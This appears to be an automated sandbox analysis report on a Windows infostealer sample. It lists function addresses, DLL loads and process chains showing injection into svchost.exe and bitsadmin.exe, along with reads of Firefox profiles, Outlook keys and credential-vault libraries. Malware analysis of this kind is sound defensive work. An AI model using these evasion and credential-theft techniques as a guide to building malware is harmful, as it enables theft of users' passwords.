Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305FB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03015BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FDDBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03057A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305FA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03013A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FBFB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03041AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0303DAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0304DAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03035910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA38E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0300D800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA9950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FBB950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305FF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA9EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305FFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA1F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03051D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03057D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03019C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FBFDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA3D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305FCF2
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_03A703E6
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039BE3F0
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_03A6A352
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_03A302C0
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_03A50274
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_03A641A2
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_03A701AA
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A681CC7_2_03A681CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039A01007_2_039A0100
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A4A1187_2_03A4A118
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A381587_2_03A38158
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A420007_2_03A42000
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039AC7C07_2_039AC7C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039D47507_2_039D4750
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B07707_2_039B0770
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039CC6E07_2_039CC6E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A705917_2_03A70591
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B05357_2_039B0535
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A5E4F67_2_03A5E4F6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A544207_2_03A54420
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A624467_2_03A62446
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A66BD77_2_03A66BD7
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6AB407_2_03A6AB40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039AEA807_2_039AEA80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A7A9A67_2_03A7A9A6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B29A07_2_039B29A0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039C69627_2_039C6962
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039968B87_2_039968B8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039DE8F07_2_039DE8F0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039BA8407_2_039BA840
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B28407_2_039B2840
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A2EFA07_2_03A2EFA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039A2FC87_2_039A2FC8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039BCFE07_2_039BCFE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A52F307_2_03A52F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039D0F307_2_039D0F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039F2F287_2_039F2F28
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A24F407_2_03A24F40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039C2E907_2_039C2E90
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6CE937_2_03A6CE93
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6EEDB7_2_03A6EEDB
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6EE267_2_03A6EE26
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B0E597_2_039B0E59
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039C8DBF7_2_039C8DBF
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039AADE07_2_039AADE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039BAD007_2_039BAD00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A4CD1F7_2_03A4CD1F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A50CB57_2_03A50CB5
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039A0CF27_2_039A0CF2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B0C007_2_039B0C00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039F739A7_2_039F739A
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6132D7_2_03A6132D
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0399D34C7_2_0399D34C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B52A07_2_039B52A0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A512ED7_2_03A512ED
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039CB2C07_2_039CB2C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039BB1B07_2_039BB1B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A7B16B7_2_03A7B16B
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0399F1727_2_0399F172
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E516C7_2_039E516C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6F0E07_2_03A6F0E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A670E97_2_03A670E9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B70C07_2_039B70C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A5F0CC7_2_03A5F0CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6F7B07_2_03A6F7B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A616CC7_2_03A616CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039F56307_2_039F5630
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A4D5B07_2_03A4D5B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A795C37_2_03A795C3
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A675717_2_03A67571
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6F43F7_2_03A6F43F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039A14607_2_039A1460
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039CFB807_2_039CFB80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A25BF07_2_03A25BF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039EDBF97_2_039EDBF9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6FB767_2_03A6FB76
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A51AA37_2_03A51AA3
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A4DAAC7_2_03A4DAAC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039F5AA07_2_039F5AA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A5DAC67_2_03A5DAC6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A23A6C7_2_03A23A6C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A67A467_2_03A67A46
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6FA497_2_03A6FA49
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A459107_2_03A45910
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B99507_2_039B9950
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039CB9507_2_039CB950
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B38E07_2_039B38E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A1D8007_2_03A1D800
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B1F927_2_039B1F92
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6FFB17_2_03A6FFB1
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03973FD57_2_03973FD5
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03973FD27_2_03973FD2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6FF097_2_03A6FF09
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B9EB07_2_039B9EB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039CFDC07_2_039CFDC0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A67D737_2_03A67D73
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039B3D407_2_039B3D40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A61D5A7_2_03A61D5A
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A6FCF27_2_03A6FCF2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03A29C327_2_03A29C32
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03271D607_2_03271D60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0326AFA97_2_0326AFA9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0326AFB07_2_0326AFB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0326AE607_2_0326AE60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0326CE807_2_0326CE80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0326CC607_2_0326CC60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_032736207_2_03273620
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0327361B7_2_0327361B
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_032754207_2_03275420
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0328BB407_2_0328BB40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0388E3577_2_0388E357
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0389541C7_2_0389541C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0388E4747_2_0388E474
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0388CB787_2_0388CB78
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0388D8D87_2_0388D8D8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0388E80F7_2_0388E80F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03895C117_2_03895C11
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: String function: 039F7E54 appears 111 times
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: String function: 03A1EA12 appears 86 times
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: String function: 0399B970 appears 280 times
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: String function: 039E5130 appears 58 times
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: String function: 03A2F290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0300EA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FD5130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FE7E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F8B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0301F290 appears 105 times
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: String function: 00428900 appears 41 times
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: String function: 00420AE3 appears 70 times
Source: 1SxKeB4u0c.exe, 00000000.00000003.1432370477.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamearmsvc.exeN vs 1SxKeB4u0c.exe
Source: 1SxKeB4u0c.exe, 00000000.00000003.1438352216.0000000004193000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 1SxKeB4u0c.exe
Source: 1SxKeB4u0c.exe, 00000000.00000003.1438528284.000000000433D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 1SxKeB4u0c.exe
Source: 1SxKeB4u0c.exe, 00000000.00000003.1437101220.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameALG.exej% vs 1SxKeB4u0c.exe
Source: 1SxKeB4u0c.exe, 00000000.00000003.1441801356.0000000004373000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 1SxKeB4u0c.exe
Source: 1SxKeB4u0c.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 1SxKeB4u0c.exe | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine | Classification label: mal100.spre.troj.spyw.evad.winEXE@9/7@17/10
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0046A06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F3CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | File created: C:\Users\user\AppData\Roaming\7d5db47b92cfd441.bin
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7d5db47b92cfd441-inf
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7d5db47b92cfd4413d78ffaf-b
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | File created: C:\Users\user\AppData\Local\Temp\aut8CEA.tmp
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: bitsadmin.exe, 00000007.00000003.1868711182.0000000003475000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3894745583.0000000003475000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1868457679.0000000003454000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3894745583.00000000034A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 1SxKeB4u0c.exe | ReversingLabs: Detection: 86%
Source: 1SxKeB4u0c.exe | Virustotal: Detection: 83%
Source: unknown | Process created: C:\Users\user\Desktop\1SxKeB4u0c.exe "C:\Users\user\Desktop\1SxKeB4u0c.exe"
Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1SxKeB4u0c.exe"
Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
Source: C:\Windows\SysWOW64\bitsadmin.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: webio.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\bitsadmin.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: 1SxKeB4u0c.exe | Static file information: File size 1794048 > 1048576
Source: 1SxKeB4u0c.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb | source: 1SxKeB4u0c.exe, 00000000.00000003.1432232486.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source: Binary string: AppVClient.pdbGCTL | source: AppVClient.exe.0.dr
Source: Binary string: ALG.pdbGCTL | source: 1SxKeB4u0c.exe, 00000000.00000003.1437010006.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source: Binary string: AppVClient.pdb | source: AppVClient.exe.0.dr
Source: Binary string: bitsadmin.pdb | source: svchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bitsadmin.pdbGCTL | source: svchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: LbtMpScwNRqrVB.exe, 00000006.00000002.3894269356.000000000013E000.00000002.00000001.01000000.00000005.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750220082.000000000013E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP | source: 1SxKeB4u0c.exe, 00000000.00000003.1452279000.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1441801356.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586104823.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1583925733.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1684871418.00000000037BB000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1682483471.000000000360E000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003970000.00000040.00001000.00020000.00000000.sdmp
